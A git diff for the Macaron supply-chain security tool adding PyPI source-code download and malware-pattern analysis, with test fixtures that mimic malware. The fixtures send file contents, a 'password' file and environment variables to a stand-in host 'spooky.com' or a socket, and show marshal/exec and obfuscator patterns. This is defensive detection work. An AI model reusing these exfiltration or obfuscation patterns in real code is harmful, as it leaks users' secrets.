evaluate_heuristic_results( self, heuristic_results: dict[Heuristics, HeuristicResult] @@ -279,6 +297,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: has_repository=ctx.component.repository is not None, pypi_registry=pypi_registry, package_json={}, + package_sourcecode_path="", ) pypi_registry_info.metadata.append(pypi_package_json) @@ -286,28 +305,39 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: # Download the PyPI package JSON, but no need to persist it to the filesystem. if pypi_package_json.package_json or pypi_package_json.download(dest=""): try: - result, detail_info = self.run_heuristics(pypi_package_json) + heuristic_results, heuristics_detail_info = self.run_heuristics(pypi_package_json) except HeuristicAnalyzerValueError: return CheckResultData(result_tables=[], result_type=CheckResultType.UNKNOWN) - confidence, triggered_rules = self.evaluate_heuristic_results(result) - detail_info["triggered_rules"] = triggered_rules + confidence, triggered_rules = self.evaluate_heuristic_results(heuristic_results) + heuristics_detail_info["triggered_rules"] = triggered_rules result_type = CheckResultType.FAILED if not confidence: confidence = Confidence.HIGH result_type = CheckResultType.PASSED - elif ctx.dynamic_data["validate_malware"]: - is_malware, validation_result = self.validate_malware(pypi_package_json) - if is_malware: # Find source code block matched the malicious pattern - confidence = Confidence.HIGH - elif validation_result: # Find suspicious source code, but cannot be confirmed - confidence = Confidence.MEDIUM - logger.debug(validation_result) + + # experimental sourcecode analysis feature + if ctx.dynamic_data["analyze_source"]: + try: + sourcecode_result, sourcecode_detail_info = self.analyze_source( + pypi_package_json, heuristic_results + ) + except (HeuristicAnalyzerValueError, ConfigurationError): + return CheckResultData(result_tables=[], result_type=CheckResultType.UNKNOWN) + + heuristic_results[Heuristics.SUSPICIOUS_PATTERNS] = sourcecode_result + heuristics_detail_info.update(sourcecode_detail_info) + + if sourcecode_result == HeuristicResult.FAIL: + if result_type == CheckResultType.PASSED: + # heuristics determined it benign, so lower the confidence + confidence = Confidence.LOW + result_type = CheckResultType.FAILED result_tables.append( MaliciousMetadataFacts( - result=result, - detail_information=detail_info, + result=heuristic_results, + detail_information=heuristics_detail_info, confidence=confidence, ) ) diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index b0b0275b5..2c6af515c 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -5,10 +5,13 @@ import logging import os +import re +import shutil import tarfile import tempfile import urllib.parse -import zipfile +from collections.abc import Callable, Generator, Iterator +from contextlib import contextmanager from dataclasses import dataclass from datetime import datetime @@ -17,7 +20,7 @@ from requests import RequestException from macaron.config.defaults import defaults -from macaron.errors import ConfigurationError, InvalidHTTPResponseError +from macaron.errors import ConfigurationError, InvalidHTTPResponseError, SourceCodeError from macaron.json_tools import json_extract from macaron.malware_analyzer.datetime_parser import parse_datetime from macaron.slsa_analyzer.package_registry.package_registry import PackageRegistry @@ -26,6 +29,10 @@ logger: logging.Logger = logging.getLogger(__name__) +def _handle_temp_dir_clean(function: Callable, path: str, onerror: tuple) -> None: + raise SourceCodeError(f"Error removing with shutil. function={function}, " f"path={path}, excinfo={onerror}") + + class PyPIRegistry(PackageRegistry): """This class implements the pypi package registry.""" @@ -159,77 +166,102 @@ def download_package_json(self, url: str) -> dict: return res_obj - def fetch_sourcecode(self, src_url: str) -> dict[str, str] | None: - """Get the source code of the package. + def download_package_sourcecode(self, url: str) -> str: + """Download the package source code from pypi registry. + + Parameters + ---------- + url: str + The package source code url. Returns ------- - str | None - The source code. + str + The temp directory with the source code. + + Raises + ------ + InvalidHTTPResponseError + If the HTTP request to the registry fails or an unexpected response is returned. """ # Get name of file. - _, _, file_name = src_url.rpartition("/") - - # Create a temporary directory to store the downloaded source. - with tempfile.TemporaryDirectory() as temp_dir: + _, _, file_name = url.rpartition("/") + package_name = re.sub(r"\.tar\.gz$", "", file_name) + + # temporary directory to unzip and read all source files + temp_dir = tempfile.mkdtemp(prefix=f"{package_name}_") + response = send_get_http_raw(url, stream=True) + if response is None: + error_msg = f"Unable to find package source code using URL: {url}" + logger.debug(error_msg) try: - response = requests.get(src_url, stream=True, timeout=40) - response.raise_for_status() - except requests.exceptions.HTTPError as http_err: - logger.debug("HTTP error occurred: %s", http_err) - return None + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + raise InvalidHTTPResponseError(error_msg) from tempdir_exception - if response.status_code != 200: - return None + raise InvalidHTTPResponseError(error_msg) - source_file = os.path.join(temp_dir, file_name) - with open(source_file, "wb") as file: - try: - for chunk in response.iter_content(): - file.write(chunk) - except RequestException as error: - # Something went wrong with the request, abort. - logger.debug("Error while streaming source file: %s", error) - response.close() - return None - logger.debug("Begin fetching the source code from PyPI") - py_files_content: dict[str, str] = {} - if tarfile.is_tarfile(source_file): + with tempfile.NamedTemporaryFile("+wb", delete=True) as source_file: + try: + for chunk in response.iter_content(): + source_file.write(chunk) + source_file.flush() + except RequestException as stream_error: + error_msg = f"Error while streaming source file: {stream_error}" + logger.debug(error_msg) try: - with tarfile.open(source_file, "r:gz") as tar: - for member in tar.getmembers(): - if member.isfile() and member.name.endswith(".py") and member.size > 0: - file_obj = tar.extractfile(member) - if file_obj: - content = file_obj.read().decode("utf-8") - py_files_content[member.name] = content - except tarfile.ReadError as exception: - logger.debug("Error reading tar file: %s", exception) - return None - elif zipfile.is_zipfile(source_file): + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + + raise InvalidHTTPResponseError(error_msg) from RequestException + + if tarfile.is_tarfile(source_file.name): try: - with zipfile.ZipFile(source_file, "r") as zip_ref: - for info in zip_ref.infolist(): - if info.filename.endswith(".py") and not info.is_dir() and info.file_size > 0: - with zip_ref.open(info) as file_obj: - content = file_obj.read().decode("utf-8") - py_files_content[info.filename] = content - except zipfile.BadZipFile as bad_zip_exception: - logger.debug("Error reading zip file: %s", bad_zip_exception) - return None - except zipfile.LargeZipFile as large_zip_exception: - logger.debug("Zip file too large to read: %s", large_zip_exception) - return None - # except KeyError as zip_key_exception: - # logger.debug( - # "Error finding target '%s' in zip file '%s': %s", archive_target, source_file, zip_key_exception - # ) - # return None + with tarfile.open(source_file.name, "r:gz") as sourcecode_tar: + sourcecode_tar.extractall(temp_dir, filter="data") + + except tarfile.ReadError as read_error: + error_msg = f"Error reading source code tar file: {read_error}" + logger.debug(error_msg) + try: + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + + raise InvalidHTTPResponseError(error_msg) from read_error + + extracted_dir = os.listdir(temp_dir) + if len(extracted_dir) == 1 and package_name == extracted_dir[0]: + # structure used package name and version as top-level directory + temp_dir = os.path.join(temp_dir, extracted_dir[0]) + else: - logger.debug("Unable to extract file: %s", file_name) + error_msg = f"Unable to extract source code from file {file_name}" + logger.debug(error_msg) + try: + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + raise InvalidHTTPResponseError(error_msg) from tempdir_exception + + raise InvalidHTTPResponseError(error_msg) - logger.debug("Successfully fetch the source code from PyPI") - return py_files_content + logger.debug("Temporary download and unzip of %s stored in %s", file_name, temp_dir) + return temp_dir def get_package_page(self, package_name: str) -> str | None: """Implement custom API to get package main page. @@ -389,6 +421,9 @@ class PyPIPackageJsonAsset: #: The asset content. package_json: dict + #: the source code temporary location name + package_sourcecode_path: str + #: The size of the asset (in bytes). This attribute is added to match the AssetLocator #: protocol and is not used because pypi API registry does not provide it. @property @@ -518,16 +553,120 @@ def get_latest_release_upload_time(self) -> str | None: return upload_time return None - def get_sourcecode(self) -> dict[str, str] | None: - """Get source code of the package. + @contextmanager + def sourcecode(self) -> Generator[None]: + """Download and cleanup source code of the package with a context manager.""" + if not self.download_sourcecode(): + raise SourceCodeError("Unable to download package source code.") + yield + self.cleanup_sourcecode() + + def download_sourcecode(self) -> bool: + """Get the source code of the package and store it in a temporary directory. Returns ------- - dict[str, str] | None - The source code of each script in the package + bool + ``True`` if the source code is downloaded successfully; ``False`` if not. """ - url: str | None = self.get_sourcecode_url() + url = self.get_sourcecode_url() if url: - source_code: dict[str, str] | None = self.pypi_registry.fetch_sourcecode(url) - return source_code - return None + try: + self.package_sourcecode_path = self.pypi_registry.download_package_sourcecode(url) + return True + except InvalidHTTPResponseError as error: + logger.debug(error) + return False + + def cleanup_sourcecode(self) -> None: + """ + Delete the temporary directory created when downloading the source code. + + The package source code is no longer accessible after this, and the package_sourcecode_path + attribute is set to an empty string. + """ + if self.package_sourcecode_path: + try: + shutil.rmtree(self.package_sourcecode_path, onerror=_handle_temp_dir_clean) + self.package_sourcecode_path = "" + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {self.package_sourcecode_path}" + f" for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + raise tempdir_exception + + def get_sourcecode_file_contents(self, path: str) -> bytes: + """ + Get the contents of a single source code file specified by the path. + + The path can be relative to the package_sourcecode_path attribute, or an absolute path. + + Parameters + ---------- + path: str + The absolute or relative to package_sourcecode_path file path to open. + + Returns + ------- + bytes + The raw contents of the source code file. + + Raises + ------ + SourceCodeError + if the source code has not been downloaded, or there is an error accessing the file. + """ + if not self.package_sourcecode_path: + error_msg = "No source code files have been downloaded" + logger.debug(error_msg) + raise SourceCodeError(error_msg) + + if not os.path.isabs(path): + path = os.path.join(self.package_sourcecode_path, path) + + if not os.path.exists(path): + error_msg = f"Unable to locate file {path}" + logger.debug(error_msg) + raise SourceCodeError(error_msg) + + try: + with open(path, "rb") as file: + return file.read() + except OSError as read_error: + error_msg = f"Unable to read file {path}: {read_error}" + logger.debug(error_msg) + raise SourceCodeError(error_msg) from read_error + + def iter_sourcecode(self) -> Iterator[tuple[str, bytes]]: + """ + Iterate through all source code files. + + Returns + ------- + tuple[str, bytes] + The source code file path, and the the raw contents of the source code file. + + Raises + ------ + SourceCodeError + if the source code has not been downloaded. + """ + if not self.package_sourcecode_path: + error_msg = "No source code files have been downloaded" + logger.debug(error_msg) + raise SourceCodeError(error_msg) + + for root, _directories, files in os.walk(self.package_sourcecode_path): + for file in files: + if root == ".": + root_path = os.getcwd() + os.linesep + else: + root_path = root + filepath = os.path.join(root_path, file) + + with open(filepath, "rb") as handle: + contents = handle.read() + + yield filepath, contents diff --git a/src/macaron/util.py b/src/macaron/util.py index d037ead10..96af86991 100644 --- a/src/macaron/util.py +++ b/src/macaron/util.py @@ -131,6 +131,7 @@ def send_get_http_raw( timeout: int | None = None, allow_redirects: bool = True, check_response_fails: bool = True, + stream: bool = False, ) -> Response | None: """Send the GET HTTP request with the given url and headers. @@ -148,6 +149,8 @@ def send_get_http_raw( Whether to allow redirects. Default: True. check_response_fails: bool When True, check if the response fails. Otherwise, return the response. + stream: bool + Indicates whether the response should be immediately downloaded (False) or streamed (True). Default: False. Returns ------- @@ -164,10 +167,7 @@ def send_get_http_raw( retry_counter = error_retries try: response = requests.get( - url=url, - headers=headers, - timeout=timeout, - allow_redirects=allow_redirects, + url=url, headers=headers, timeout=timeout, allow_redirects=allow_redirects, stream=stream ) except requests.exceptions.RequestException as error: logger.debug(error) diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json new file mode 100644 index 000000000..95ceffc0f --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json @@ -0,0 +1,22 @@ +{ + "src.macaron.resources.pypi_malware_rules.exfiltration_remote-exfiltration": { + "message": "Detected exfiltration of sensitive data to a remote endpoint", + "detections": [ + { + "file": "exfiltration/remote_exfiltration.py", + "start": 31, + "end": 31 + }, + { + "file": "exfiltration/remote_exfiltration.py", + "start": 42, + "end": 42 + }, + { + "file": "exfiltration/remote_exfiltration.py", + "start": 50, + "end": 50 + } + ] + } +} diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote_exfiltration.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote_exfiltration.py new file mode 100644 index 000000000..e2602ef1f --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote_exfiltration.py @@ -0,0 +1,50 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + + # NOTE: since these are flows, all will go in subfunctions that they are supposed to be in so the detections + # can be sections out. + + def os_to_requests(): + import os + + import requests + with os.popen("cat important_file") as pipe: + requests.post("spooky.com", data=pipe.read()) + + def file_exfil_to_urllib3(): + import os as oo + + import urllib3 as uuu + op = oo.O_RDWR + do_it = oo.open + file = do_it("every_password", op) + man = uuu.PoolManager + http = man().request + http('POST', "spooky.com", body=oo.read(file, 2048)) + + def environ_to_socket(): # nosemgrep + import socket as s # nosemsemgrep + from os import environ as environment_vars # nosemgrep + with s.socket(s.AF_INET, s.SOCK_STREAM) as soc: # nosemgrep + soc.connect(('localhost', 0)) # nosemgrep + other = soc # nosemgrep + other.send(environment_vars) # nosemgrep diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py new file mode 100644 index 000000000..114072a52 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py @@ -0,0 +1,67 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + + # NOTE: since these are flows, all will go in subfunctions that they are supposed to be in so the detections + # can be sections out. + + # marshal encryption from pyobfuscate.com/marshal-encrypt, script is just print("Hello world!") + def marshal_flow(): + from marshal import loads + bytecode = loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x0c\x00\x00\x00e\x00d\x00\x83\x01\x01\x00d\x01S\x00)\x02z\x0cHello world!N)\x01\xda\x05print\xa9\x00r\x02\x00\x00\x00r\x02\x00\x00\x00\xfa\x08\xda\x08\x01\x00\x00\x00\xf3\x00\x00\x00\x00') + exec(bytecode) + + def marshal_inline_flow(): + exec(__import__('marshal').loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x0c\x00\x00\x00e\x00d\x00\x83\x01\x01\x00d\x01S\x00)\x02z\x0cHello world!N)\x01\xda\x05print\xa9\x00r\x02\x00\x00\x00r\x02\x00\x00\x00\xfa\x08\xda\x08\x01\x00\x00\x00\xf3\x00\x00\x00\x00')) + + def bytes_eval_to_soc_bind(): + import socket + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as soc: + soc.bind(__import__('builtins').eval(b'("127.0.0.1", 0)'.decode())) + + def map_b64_to_request(): + import requests as req + + # decodes to GET + method = __import__('base64').b64decode(b'R0VU') + # just maps to a random fake link https://www.print-hello-world-sample.com/print/hello/world! + link = ''.join(map(chr, [104, 116, 116, 112, 115, 58, 47, 47, 119, 119, 119, 46, 112, 114, 105, 110, 116, 45, 104, 101, 108, 108, 111, 45, 119, 111, 114, 108, 100, 45, 115, 97, 109, 112, 108, 101, 46, 99, 111, 109, 47, 112, 114, 105, 110, 116, 47, 104, 101, 108, 108, 111, 47, 119, 111, 114, 108, 100, 33])) + _ = req.Request(method, link) + + def zlib_ast_subprocess(): + import subprocess + import zlib as zeeee + from ast import literal_eval + + # just decodes to ["echo", "Hello world!"] + subprocess.Popen(literal_eval(zeeee.decompress(b'x\x9c\x8bVOM\xce\xc8W\xd7QP\xf7H\xcd\xc9\xc9W(\xcf/\xcaIQT\x8f\x05\x00]\xa0\x07\x9d').decode())) + + def propagation_to_write(): + import os as e + + # symbol propagations should detect assign of os as e to o and bytes to b and still trigger + o = e + b = bytes + # just decodes to "Hello world!" + contents = b.fromhex("48656C6C6F20776F726C6421") + # just decodes to "some_path" + file = o.open(''.join(chr(c) for c in [115, 111, 109, 101, 95, 112, 97, 116, 104]), o.O_RDWR) + o.pwritev(file, contents, 0) diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json new file mode 100644 index 000000000..a905dc12d --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -0,0 +1,232 @@ +{ + "src.macaron.resources.pypi_malware_rules.obfuscation_decode-and-execute": { + "message": "Detected the flow of a decoded primitive value to a remote endpoint, process, code evaluation, or file write", + "detections": [ + { + "file": "obfuscation/decode_and_execute.py", + "start": 30, + "end": 30 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 47, + "end": 47 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 55, + "end": 55 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 67, + "end": 67 + } + ] + }, + "src.macaron.resources.pypi_malware_rules.obfuscation_inline-imports": { + "message": "Found an instance of a suspicious API in a hardcoded inline import", + "detections": [ + { + "file": "obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 44, + "end": 44 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 23, + "end": 23 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 24, + "end": 24 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 25, + "end": 25 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 26, + "end": 26 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 27, + "end": 27 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 28, + "end": 28 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 29, + "end": 29 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 31, + "end": 31 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 32, + "end": 32 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 69, + "end": 69 + } + ] + }, + "src.macaron.resources.pypi_malware_rules.obfuscation_obfuscation-tools": { + "message": "Found an indicator of the use of a python code obfuscation tool", + "detections": [ + { + "file": "obfuscation/obfuscation_tools.py", + "start": 23, + "end": 23 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 25, + "end": 31 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 26, + "end": 26 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 27, + "end": 27 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 28, + "end": 28 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 30, + "end": 31 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 37, + "end": 37 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 39, + "end": 45 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 40, + "end": 40 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 41, + "end": 41 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 42, + "end": 42 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 44, + "end": 45 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 47, + "end": 47 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 51, + "end": 51 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 53, + "end": 59 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 54, + "end": 54 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 55, + "end": 55 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 56, + "end": 56 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 58, + "end": 59 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 61, + "end": 61 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 65, + "end": 65 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 68, + "end": 68 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 68, + "end": 68 + } + ] + } +} diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py new file mode 100644 index 000000000..80e006781 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py @@ -0,0 +1,32 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + + __import__('base64') + __import__('builtins') + __import__('subprocess') + __import__('sys') + __import__('os') + __import__('zlib') + __import__('marshal') + # these both just import builtins + __import__('\142\165\151\154\164\151\156\163') + __import__('\x62\x75\x69\x6c\x74\x69\x6e\x73') diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/obfuscation_tools.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/obfuscation_tools.py new file mode 100644 index 000000000..270f88600 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/obfuscation_tools.py @@ -0,0 +1,69 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + # using pyobfuscate.com/rename-obf to rename items, code is a class that has one method that prints Hello world! + lllllllllllllll, llllllllllllllI = __name__, print + + class lIIlIIIIIIIlIlllIl: + IIlIllIIlllIlIlIll = 'Hello' + IlIIlIIIlIllIIlIIl = 'world' + IIlIlIlIIIIlIIlIlI = '!' + + def IIlIlIIIIlIlIlIIll(IIIlIlIIllllIlIlll): + llllllllllllllI(f'{IIIlIlIIllllIlIlll.IIlIllIIlllIlIlIll} {IIIlIlIIllllIlIlll.IlIIlIIIlIllIIlIIl}{IIIlIlIIllllIlIlll.IIlIlIlIIIIlIIlIlI}') + if lllllllllllllll == '__main__': + llIlIIIllIIIIlIlll = lIIlIIIIIIIlIlllIl() + llIlIIIllIIIIlIlll.IIlIlIIIIlIlIlIIll() + + # using using pyob.oxyry.com's naming convention + __O0O00O00O0OOOOO0O, __OO00000OOOO000OO0 = __name__, print + + class OO0OO0OOO0OOOO000: + OO000OOOOO00O0OOO = 'Hello' + OOO0O00O00000O0O0 = 'world' + OOOOO0O000O0O000O = '!' + + def OOOOOO000OOO0O0O0(O00O00O0O00O000O0): + __OO00000OOOO000OO0(f'{O00O00O0O00O000O0.OO000OOOOO00O0OOO} {O00O00O0O00O000O0.OOO0O00O00000O0O0}{O00O00O0O00O000O0.OOOOO0O000O0O000O}') + if __O0O00O00O0OOOOO0O == '__main__': + __OO00000O00OOOO0OO = OO0OO0OOO0OOOO000() + __OO00000O00OOOO0OO.OOOOOO000OOO0O0O0() + + # using pyarmor's RTF mode naming convention + pyarmor__12, pyarmor__14 = __name__, print + + class pyarmor__16: + pyarmor__18 = 'Hello' + pyarmor__0 = 'world' + pyarmor__8 = '!' + + def pyarmor__24(pyarmor__60): + pyarmor__14(f'{pyarmor__60.pyarmor__18} {pyarmor__60.pyarmor__0}{pyarmor__60.pyarmor__8}') + if pyarmor__12 == '__main__': + pyarmor__2 = pyarmor__16() + pyarmor__2.pyarmor__24() + + # inline pyarmor marker + # pyarmor: print('this script is obfuscated') + + # obfuscated using pyobfuscate.com/pyd's AES 256-bit encryption + pyobfuscate=(lambda getattr:[((lambda IIlII,IlIIl:setattr(__builtins__,IIlII,IlIIl))(IIlII,IlIIl)) for IIlII,IlIIl in getattr.items()]);Il=chr(114)+chr(101);lI=r'[^a-zA-Z0-9]';lIl=chr(115)+chr(117)+chr(98);lllllllllllllll, llllllllllllllI, lllllllllllllIl,lllllllllIIllIIlI = __import__, getattr, bytes,exec + __import__("sys").setrecursionlimit(100000000);lllllllllIIllIIlI(llllllllllllllI(lllllllllllllll(lllllllllllllIl.fromhex('7a6c6962').decode()), lllllllllllllIl.fromhex('6465636f6d7072657373').decode())(lllllllllllllIl.fromhex('789ced1ded6edb38f2557cbf22b559c1f737455e615f20300437717b069cb8485cec2e0ef7ee2759964491f3c90f597224140b9543cef70c6748b95b96f5f378d8be7e7fd9aeca87d33fbf76d99732ff56aecbc78fd3fbb7f2f23cbeec9f4fd5683775fd50ae8bb27c3ebeeccab2783e96dbf79fcfc7df6fa7f392c73f8f6fbbea6dfd58ae1b1c8f0d9eeca9c29ce5f7d59f167556c1d65983f7a15a5243fa918a52f5f79ada79c500500fe69b8ad9f2f169736195a2033fa648e7a7306617c822674276561db928cbeba752efba67ca62c2e400a67759e960e86d58affeb9eb665a04feb3fbfb1e18ae6c7d6f68a25179cf8b561bcc70d928e3a9056ebe7ae2ef703d652dfccb97f6ed6bb7240f2090197caa191d7006b15671e6ab5b9bb50e79ee25ec10599e354ee07a6af300feaa8e1867fec0271eda974eae40233276c89b5411413015d9388ec9a2e9c32383228566323767d253c1e8cbfd3c522fe5a89660fc772ccb926c991c6db0582eeddde36dfbdaef1f6d40fc381cb72710433be3e7e1f87d7bf870e7b413f6a7dd3bca439c6dd8021ad2fb99231c438b854d3fc364dbeaec690369ccdea9d78f55ddb38675db627a3ebefe3af4bbffd0e4cf87edc7c7d9e67d02fcb13f746ed08efef77ff736de5fc7bfee873c3dfcdc9db6a7d33b659baccab74f04bc99044ec80671e66d9750349874839853236dcbbcd8bc4517364c4c185df20cdd533bd3eb6a8ca924ff44ae5de510a7921bc6ffcbfeddee18cc59565fd2da6988b39d7b7c7fb9a71004158a4d13756efabc115ac054dd43a4d225298f00aff556a443953d6d545e9b653e55a4b85cedc73c0acfe00ddf4010905ece1a0d4c87bdc3085eaea0a98858b498e279a0bc89d23be320aed2679036a7b6676818a58caedbcc53b7c218cd2e141261778be27eceb241c4de20ec72823fbf6cb08c76fa103d18977c776bf94e7166e6229abb6e3a708a236d1feee225c31ad31f1d78035c7798874c59776e32c9d41b642b1c57b08dae6d645141c3edfbf076e40ea5e93de43919cc210af472e1f4fb2b91dfa0dd0fe0ba2ade18b2c16503c12c5660286f37e4b21a2b914b5c23374108dcf2d7a6dcc910a837777158dd14eb56246ceb362b1c7d5994e7c0317dbda1640643598e74d836c717dfb79224e638eb0e47a58cfd0f22bd3199af6eb2d61bc291ea63b6dde163677077666b9d886c470f02d5c01fc7f7b302f66f75f3919b370e5cd3c1160b0f46b510ff50c5f00977b139c3f856a5bffe299b3c70ae51065aa995d168a5b9a8af15d3b17ef6963cdf40df74148d104543d272caccf0315349608aab8611a7a7531f84ed2c7cd7554eae9dece619e12f6612e0b1c7276d2e908dd6b98ee3b8e968d0740d813d3e56b248b92fcc8e0cdf55f8b943fba22808e07b0d963a8094f345bd079a7b31f2c10acd1d5662912a91577ec3fb628eab0e5782161bff1081e38ad395108c38577d0c9aec1034ddf9eae3652caf37f084fcdb4f5a79c86c12ebb4519979049c091923f3879d490484bba521d9449d88635a0a103e4641e0a1b9880d89f169d7f5124bd8698a3eb12b542ededb0066f9649762bf10947d91e48f9f9c1869838c91bb5f31a6bb4fe424ed188c5d3c71843df21dad58a7a8948b0e08c416bdfa3531a350dc86c99aafa4bbf5c5e327e0e3ce8b321b246d8a74fe116fe7153a008d589c30f515c1d56ae7160cb5fec12d6fc43a35042cda84476ebbc58a715fc2ba5acf5d83c